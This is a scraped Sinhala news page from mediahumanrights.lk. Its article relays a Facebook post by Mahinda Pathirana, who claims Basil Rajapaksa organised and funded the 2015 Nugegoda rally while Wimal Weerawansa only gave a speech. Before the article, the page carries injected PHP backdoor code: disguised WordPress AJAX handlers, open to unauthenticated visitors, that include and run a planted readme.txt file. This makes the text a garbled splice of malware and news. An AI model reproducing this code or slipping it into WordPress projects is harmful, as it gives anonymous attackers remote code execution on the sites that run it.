if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ‘මහින්ද සුළඟ’ නුගේගොඩ රැලිය ඇමරිකාවේ සිට බැසිල් කල වැඩක්.. සෙනග ගෙන්වූයේද ඔහුයි… විමල් කලේ කතාවක් පැවැත්වීම විතරයි..- මහින්ද පතිරණ - mediahumanrights.lk
mediahumanrights.lk
News Political

‘මහින්ද සුළඟ’ නුගේගොඩ රැලිය ඇමරිකාවේ සිට බැසිල් කල වැඩක්.. සෙනග ගෙන්වූයේද ඔහුයි… විමල් කලේ කතාවක් පැවැත්වීම විතරයි..- මහින්ද පතිරණ

2015 ජනාධිපතිවරණයෙන් මහින්ද රාජපක්ෂ මහතා පරාජය වීමෙන් පසු නුගේගොඩ ආනන්ද සමරකෝන් පිටියේ පැවති ‘මහින්ද සුළඟ’ නම් ලත් රැස්වීම සංවිධානය කරන ලද්දේ ඇමරිකාවේ සිට බැසිල් රාජපක්ෂ මහතා විසින් බව ශ්‍රී ලංකා පුවත්පත් මණ්ඩලයේ සභාපති මහින්ද පතිරණ මහතා සඳහන් කරයි.

එම ජන රැළියට සෙනග ගෙන්වා දුන්නේද බැසිල් රාජපක්ෂ මහතාගේ මැදිහත්වීමෙන් ප්‍රාදේශීය සභා මන්ත්‍රීවරුන් විසින් බවත් එම බස් රථ වලට මුදල් පවා ගෙව්වේ බැසිල් රාජපක්ෂ මහතා විසින් බවත් ඔහු පවසයි.

එම රැුස්වීම වෙනුවෙන් විමල් වීරවංශ මහතා කල කිසිදු දෙයක් නැති බවත් කල එකම දේ නම් එම රැළියේ කතාවක් පැවැත්වීම පමණක් බවත් ඔහු සදහන් කරයි.

ඒ මහතා මේ බව සඳහන් කරමින් තම ෆේස්බුක් ගිණුම තුළ තබා ඇති සටහන මෙසේය.

ඇතැමුන් තාමත් නුගේගොඩ රැළිය මතක් කරමින් මහින්ද බලවේගයට උරුමක්කාර කම් කියමින් කරන කණවැන්දුම් අඳෝනා කෙළවරක් නැති නිසා ඒ ගැන සත්‍ය ලිවීමට සිදුවීම ගැන කණගාටුවෙන් වුව ලියමි. මේවා මේ මොහොතේ මාතෘකා විය යුතු ම නොවේ. එහෙත් එක්තරා කල්ලියක් විසින් නැවත වරක් බැසිල් රාජපක්ෂ මහතා ගැන බොරු ප්‍රචාරයක් ගෙන යමින් කරන කන්දොස්කිරියාව නිසා ම ලියමි.

පරම සත්‍ය නම් නුගේගොඩ රැලිය කොළඹ නියෝජනය කරමින් සංවිධානය කළේ ගාමිණි ලොකුගේ ඇතුළු පිරිසයි. ගම්පහින් එය ප්‍රසන්න රණතුංගයි. තවත් එවක ශ්‍රීලනිප මන්ත්‍රීවරු රැසක් සිටියහ. සියල්ල සිදු කළේ ඒ වන විට ඇමරිකාවට ගොස් සිටි බැසිල් රාජපක්ෂ මහතාගේ අධීක්ෂණය යටතේ බවද අවධාරණය කරමි. කොටින් ම එදින ජනතාව රැගෙන පැමිණි සියළු බස්රථවලට මුදල් ⁣ගෙවන ලද්දේ පවා බැසිල් රාජපක්ෂ මහතා විසිනි. සෙනග රැගෙන ආවේ බැසිල් රාජපක්ෂ මහතාගේ ඍජු මැදිහත් වීම මත ලංකාවේ හතරදිග් භාගයේ සිටින ප්‍රාදේශීය, නගර සභා ඇතුළු මන්ත්‍රීවරුන් ය. ඕනෑම රැළියකට සේම ස්වේච්ඡාවෙන්ම පැමිණි විශාල පිරිසක් ද ඊට සහභාගි වූ බව ඔවුන්ට සාධාරණනයක් ලෙස කියමි. ඒ නිසා නුගේගොඩ මතක් කරමින්, අඳෝනා තබමින් විමල් වීරවංශ කල්ලිය ගෙන යන තුච්ඡ වැඩ වැඩ පිළිවෙල අප්‍රසන්න එකකි.

වීරවංශ නුගේගොඩ දී කළේ එක් දෙයක් පමණි. ඒ කතාවක් පැවැත්වීමයි. ඊට වඩා කිසිවක් ඔහුගෙන් සිදු නොවීය. තිබේ නම් කියන ලෙස අභියෝග කරමි. ඒ නිසා, නුගේගොඩ මතක් කරමින්, තම කොටස නොදුන් බව අඟවමින් ගෝලයින් ලවා කොස් ඇට බාවන වැඩේ විමල් වීරවංශ මහතා විසින් දැන්වත් නැවතිය යුතු වේ. මන්ද මේ දේශපාලනය කරන කාලය නොව, රට හැදීමට උරදෙන කාලය නිසාය. අමතර වශයෙන් කිව යුත්තේ 20 වැනි සංශෝධනය අනුමත වීම තමන්ගේ පරාජයක් ලෙස විමල් සිතන්නේ නම් එය ඔහුගේ හීනමානයේ ප්‍රශ්නයක් මිස අපගේ ප්‍රශ්නයක් නොවන බවයි. අප නම් ඔහු ගැන එසේ සිතන්නේ නැත.

– mahinda pathirana FB

lankacnews

Related posts

රේගු දැලේ පැටලුණු ජංගම දුරකථන (PHOTO)

Shiran Viraj

හදවත් බද්ධ කිරීමේ ශල්‍යකර්මයකට ලක් වූ තරුණියක් මරුට

Shiran Viraj

ඉලක්ක සපුරන්න අදත් ජනපති හදිසි ගමනක

Shiran Viraj